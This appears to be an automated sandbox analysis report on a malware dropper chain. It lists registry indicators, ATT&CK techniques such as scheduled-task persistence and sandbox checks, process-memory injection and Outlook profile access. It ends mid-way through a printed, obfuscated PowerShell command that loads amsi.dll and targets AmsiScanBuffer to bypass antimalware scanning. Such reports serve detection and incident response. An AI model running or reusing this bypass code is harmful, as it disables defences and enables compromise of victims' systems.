Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	coinbase.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cryptedprosp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WindowsServices.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wpmutnro.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WindowsServices.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jKuil2m4oIniPNC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AA.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	coinbase.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	coinbase.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	coinbase.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PowerShell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cryptedprosp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4KKi8Zrv9nyAmhR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jKuil2m4oIniPNC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	esco.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4828	cmd.exe
5852	PING.EXE

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	q3na5Mc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	q3na5Mc.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
5720	timeout.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Kills process with taskkill 10 IoCs

defense_evasion

pid	Process
2776	taskkill.exe
1808	taskkill.exe
5216	taskkill.exe
3668	taskkill.exe
5536	taskkill.exe
1264	taskkill.exe
6116	taskkill.exe
1112	taskkill.exe
2112	taskkill.exe
4800	taskkill.exe

Modifies data under HKEY_USERS 43 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133850880012286197"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
3692	reg.exe
6288	reg.exe
4828	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5852	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4360	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
456	coinbase.tmp
456	coinbase.tmp
1912	regsvr32.exe
1912	regsvr32.exe
5036	esco.exe
5036	esco.exe
5036	esco.exe
1988	powershell.exe
1988	powershell.exe
4280	PowerShell.exe
4280	PowerShell.exe
1912	regsvr32.exe
1912	regsvr32.exe
2568	powershell.exe
2568	powershell.exe
1912	regsvr32.exe
1912	regsvr32.exe
1912	regsvr32.exe
1912	regsvr32.exe
4736	6NPpGdC.exe
4736	6NPpGdC.exe
4736	6NPpGdC.exe
4736	6NPpGdC.exe
1484	VBUN8fn.exe
1484	VBUN8fn.exe
1484	VBUN8fn.exe
1484	VBUN8fn.exe
3692	q3na5Mc.exe
3692	q3na5Mc.exe
5028	random.exe
5028	random.exe
5028	random.exe
5028	random.exe
5028	random.exe
5028	random.exe
3692	q3na5Mc.exe
3692	q3na5Mc.exe
4004	chrome.exe
4004	chrome.exe
3244	cryptedprosp.exe
3244	cryptedprosp.exe
3244	cryptedprosp.exe
3244	cryptedprosp.exe
3244	cryptedprosp.exe
3244	cryptedprosp.exe
456	cryptedprosp.exe
456	cryptedprosp.exe
5048	jKuil2m4oIniPNC.exe
5048	jKuil2m4oIniPNC.exe
3780	osfile01.exe
3780	osfile01.exe
1956	powershell.exe
1956	powershell.exe
1248	powershell.exe
1248	powershell.exe
996	4KKi8Zrv9nyAmhR.exe
996	4KKi8Zrv9nyAmhR.exe
1932	powershell.exe
1932	powershell.exe
3780	osfile01.exe
5264	4KKi8Zrv9nyAmhR.exe
5264	4KKi8Zrv9nyAmhR.exe
1248	powershell.exe
1956	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3480	New Text Document mod.exe
Token: SeDebugPrivilege	5036	esco.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeIncreaseQuotaPrivilege	1988	powershell.exe
Token: SeSecurityPrivilege	1988	powershell.exe
Token: SeTakeOwnershipPrivilege	1988	powershell.exe
Token: SeLoadDriverPrivilege	1988	powershell.exe
Token: SeSystemProfilePrivilege	1988	powershell.exe
Token: SeSystemtimePrivilege	1988	powershell.exe
Token: SeProfSingleProcessPrivilege	1988	powershell.exe
Token: SeIncBasePriorityPrivilege	1988	powershell.exe
Token: SeCreatePagefilePrivilege	1988	powershell.exe
Token: SeBackupPrivilege	1988	powershell.exe
Token: SeRestorePrivilege	1988	powershell.exe
Token: SeShutdownPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeSystemEnvironmentPrivilege	1988	powershell.exe
Token: SeRemoteShutdownPrivilege	1988	powershell.exe
Token: SeUndockPrivilege	1988	powershell.exe
Token: SeManageVolumePrivilege	1988	powershell.exe
Token: 33	1988	powershell.exe
Token: 34	1988	powershell.exe
Token: 35	1988	powershell.exe
Token: 36	1988	powershell.exe
Token: SeDebugPrivilege	4280	PowerShell.exe
Token: SeIncreaseQuotaPrivilege	4280	PowerShell.exe
Token: SeSecurityPrivilege	4280	PowerShell.exe
Token: SeTakeOwnershipPrivilege	4280	PowerShell.exe
Token: SeLoadDriverPrivilege	4280	PowerShell.exe
Token: SeSystemProfilePrivilege	4280	PowerShell.exe
Token: SeSystemtimePrivilege	4280	PowerShell.exe
Token: SeProfSingleProcessPrivilege	4280	PowerShell.exe
Token: SeIncBasePriorityPrivilege	4280	PowerShell.exe
Token: SeCreatePagefilePrivilege	4280	PowerShell.exe
Token: SeBackupPrivilege	4280	PowerShell.exe
Token: SeRestorePrivilege	4280	PowerShell.exe
Token: SeShutdownPrivilege	4280	PowerShell.exe
Token: SeDebugPrivilege	4280	PowerShell.exe
Token: SeSystemEnvironmentPrivilege	4280	PowerShell.exe
Token: SeRemoteShutdownPrivilege	4280	PowerShell.exe
Token: SeUndockPrivilege	4280	PowerShell.exe
Token: SeManageVolumePrivilege	4280	PowerShell.exe
Token: 33	4280	PowerShell.exe
Token: 34	4280	PowerShell.exe
Token: 35	4280	PowerShell.exe
Token: 36	4280	PowerShell.exe
Token: SeIncreaseQuotaPrivilege	4280	PowerShell.exe
Token: SeSecurityPrivilege	4280	PowerShell.exe
Token: SeTakeOwnershipPrivilege	4280	PowerShell.exe
Token: SeLoadDriverPrivilege	4280	PowerShell.exe
Token: SeSystemProfilePrivilege	4280	PowerShell.exe
Token: SeSystemtimePrivilege	4280	PowerShell.exe
Token: SeProfSingleProcessPrivilege	4280	PowerShell.exe
Token: SeIncBasePriorityPrivilege	4280	PowerShell.exe
Token: SeCreatePagefilePrivilege	4280	PowerShell.exe
Token: SeBackupPrivilege	4280	PowerShell.exe
Token: SeRestorePrivilege	4280	PowerShell.exe
Token: SeShutdownPrivilege	4280	PowerShell.exe
Token: SeDebugPrivilege	4280	PowerShell.exe
Token: SeSystemEnvironmentPrivilege	4280	PowerShell.exe
Token: SeRemoteShutdownPrivilege	4280	PowerShell.exe
Token: SeUndockPrivilege	4280	PowerShell.exe
Token: SeManageVolumePrivilege	4280	PowerShell.exe
Token: 33	4280	PowerShell.exe

Suspicious use of FindShellTrayWindow 57 IoCs

pid	Process
456	coinbase.tmp
3780	osfile01.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
4004	chrome.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
5580	msedge.exe
3500	Explorer.EXE
3500	Explorer.EXE
3500	Explorer.EXE
3500	Explorer.EXE

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
3780	osfile01.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1912	regsvr32.exe
6912	MSBuild.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3480 wrote to memory of 5036	3480	New Text Document mod.exe	108
PID 3480 wrote to memory of 5036	3480	New Text Document mod.exe	108
PID 3480 wrote to memory of 5036	3480	New Text Document mod.exe	108
PID 3480 wrote to memory of 3488	3480	New Text Document mod.exe	109
PID 3480 wrote to memory of 3488	3480	New Text Document mod.exe	109
PID 3480 wrote to memory of 3488	3480	New Text Document mod.exe	109
PID 3488 wrote to memory of 1184	3488	coinbase.exe	110
PID 3488 wrote to memory of 1184	3488	coinbase.exe	110
PID 3488 wrote to memory of 1184	3488	coinbase.exe	110
PID 1184 wrote to memory of 4144	1184	coinbase.tmp	111
PID 1184 wrote to memory of 4144	1184	coinbase.tmp	111
PID 1184 wrote to memory of 4144	1184	coinbase.tmp	111
PID 4144 wrote to memory of 456	4144	coinbase.exe	112
PID 4144 wrote to memory of 456	4144	coinbase.exe	112
PID 4144 wrote to memory of 456	4144	coinbase.exe	112
PID 456 wrote to memory of 1912	456	coinbase.tmp	113
PID 456 wrote to memory of 1912	456	coinbase.tmp	113
PID 456 wrote to memory of 1912	456	coinbase.tmp	113
PID 1912 wrote to memory of 1988	1912	regsvr32.exe	114
PID 1912 wrote to memory of 1988	1912	regsvr32.exe	114
PID 1912 wrote to memory of 1988	1912	regsvr32.exe	114
PID 1912 wrote to memory of 4280	1912	regsvr32.exe	118
PID 1912 wrote to memory of 4280	1912	regsvr32.exe	118
PID 1912 wrote to memory of 4280	1912	regsvr32.exe	118
PID 1912 wrote to memory of 2568	1912	regsvr32.exe	120
PID 1912 wrote to memory of 2568	1912	regsvr32.exe	120
PID 1912 wrote to memory of 2568	1912	regsvr32.exe	120
PID 3480 wrote to memory of 3244	3480	New Text Document mod.exe	122
PID 3480 wrote to memory of 3244	3480	New Text Document mod.exe	122
PID 3480 wrote to memory of 3244	3480	New Text Document mod.exe	122
PID 3480 wrote to memory of 2072	3480	New Text Document mod.exe	124
PID 3480 wrote to memory of 2072	3480	New Text Document mod.exe	124
PID 3480 wrote to memory of 2072	3480	New Text Document mod.exe	124
PID 3480 wrote to memory of 3780	3480	New Text Document mod.exe	125
PID 3480 wrote to memory of 3780	3480	New Text Document mod.exe	125
PID 3480 wrote to memory of 3780	3480	New Text Document mod.exe	125
PID 3480 wrote to memory of 996	3480	New Text Document mod.exe	126
PID 3480 wrote to memory of 996	3480	New Text Document mod.exe	126
PID 3480 wrote to memory of 996	3480	New Text Document mod.exe	126
PID 3480 wrote to memory of 1484	3480	New Text Document mod.exe	127
PID 3480 wrote to memory of 1484	3480	New Text Document mod.exe	127
PID 3480 wrote to memory of 1484	3480	New Text Document mod.exe	127
PID 3480 wrote to memory of 3980	3480	New Text Document mod.exe	128
PID 3480 wrote to memory of 3980	3480	New Text Document mod.exe	128
PID 3480 wrote to memory of 3980	3480	New Text Document mod.exe	128
PID 3980 wrote to memory of 232	3980	6NPpGdC.exe	129
PID 3980 wrote to memory of 232	3980	6NPpGdC.exe	129
PID 3980 wrote to memory of 232	3980	6NPpGdC.exe	129
PID 3980 wrote to memory of 4736	3980	6NPpGdC.exe	130
PID 3980 wrote to memory of 4736	3980	6NPpGdC.exe	130
PID 3980 wrote to memory of 4736	3980	6NPpGdC.exe	130
PID 3980 wrote to memory of 4736	3980	6NPpGdC.exe	130
PID 3980 wrote to memory of 4736	3980	6NPpGdC.exe	130
PID 3980 wrote to memory of 4736	3980	6NPpGdC.exe	130
PID 3980 wrote to memory of 4736	3980	6NPpGdC.exe	130
PID 3980 wrote to memory of 4736	3980	6NPpGdC.exe	130
PID 3980 wrote to memory of 4736	3980	6NPpGdC.exe	130
PID 3480 wrote to memory of 4844	3480	New Text Document mod.exe	132
PID 3480 wrote to memory of 4844	3480	New Text Document mod.exe	132
PID 3480 wrote to memory of 4844	3480	New Text Document mod.exe	132
PID 4844 wrote to memory of 4872	4844	q3na5Mc.exe	134
PID 4844 wrote to memory of 4872	4844	q3na5Mc.exe	134
PID 4844 wrote to memory of 4872	4844	q3na5Mc.exe	134
PID 4844 wrote to memory of 3464	4844	q3na5Mc.exe	135

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	cryptedprosp.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	cryptedprosp.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:620
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:376
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:7160
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:3556

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:900

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1100

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1200
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2664
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CfmLmxZtqVMA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mUKmegJlbrhOiX,[Parameter(Position=1)][Type]$OTSshPMnxK)$lDnVMGwUJyo=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+'e'+'c'+[Char](116)+''+[Char](101)+'dD'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+'em'+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+'du'+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'Deleg'+[Char](97)+''+[Char](116)+''+'e'+'Ty'+[Char](112)+''+[Char](101)+'','C'+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+'e'+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+'s'+''+'s'+','+'A'+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$lDnVMGwUJyo.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+'a'+''+'l'+'N'+[Char](97)+''+'m'+''+[Char](101)+','+'H'+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$mUKmegJlbrhOiX).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+'a'+[Char](110)+'age'+[Char](100)+'');$lDnVMGwUJyo.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+'H'+''+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+'S'+'i'+''+'g'+''+','+''+'N'+'e'+[Char](119)+'S'+[Char](108)+''+[Char](111)+'t,'+'V'+''+[Char](105)+''+[Char](114)+''+'t'+'ual',$OTSshPMnxK,$mUKmegJlbrhOiX).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $lDnVMGwUJyo.CreateType();}$tFqollRjIVVgO=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+'e'+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'cr'+[Char](111)+'s'+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n3'+'2'+''+'.'+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'N'+[Char](97)+''+'t'+''+[Char](105)+''+[Char](118)+'e'+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$bibvmiqcVmwEvT=$tFqollRjIVVgO.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+''+'A'+'d'+'d'+''+[Char](114)+'es'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+'c'+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$henmimjIThXxcsQiJcl=CfmLmxZtqVMA @([String])([IntPtr]);$dZEWAtFISImFzaXlcHeHRY=CfmLmxZtqVMA @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KlsraLooXKC=$tFqollRjIVVgO.GetMethod(''+'G'+''+[Char](101)+'t'+'M'+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+'2'+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'')));$VnEMpgTeLQVtOy=$bibvmiqcVmwEvT.Invoke($Null,@([Object]$KlsraLooXKC,[Object]('L'+'o'+''+'a'+''+[Char](100)+'L'+'i'+''+'b'+''+'r'+''+[Char](97)+''+'r'+''+[Char](121)+''+[Char](65)+'')));$LBntRTWCbDBnzzYbp=$bibvmiqcVmwEvT.Invoke($Null,@([Object]$KlsraLooXKC,[Object]('V'+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'lPr'+'o'+''+[Char](116)+''+'e'+'c'+'t'+'')));$ozOTcqK=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VnEMpgTeLQVtOy,$henmimjIThXxcsQiJcl).Invoke(''+'a'+''+[Char](109)+'s'+'i'+'.d'+[Char](108)+''+[Char](108)+'');$ivQYabDbBWaVBDAwD=$bibvmiqcVmwEvT.Invoke($Null,@([Object]$ozOTcqK,[Object]('A'+[Char](109)+'s'+'i'+''+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+'ff'+[Char](101)+''+[Char](114)+'')));$kDvjRPuGcD=0;[Runtime.I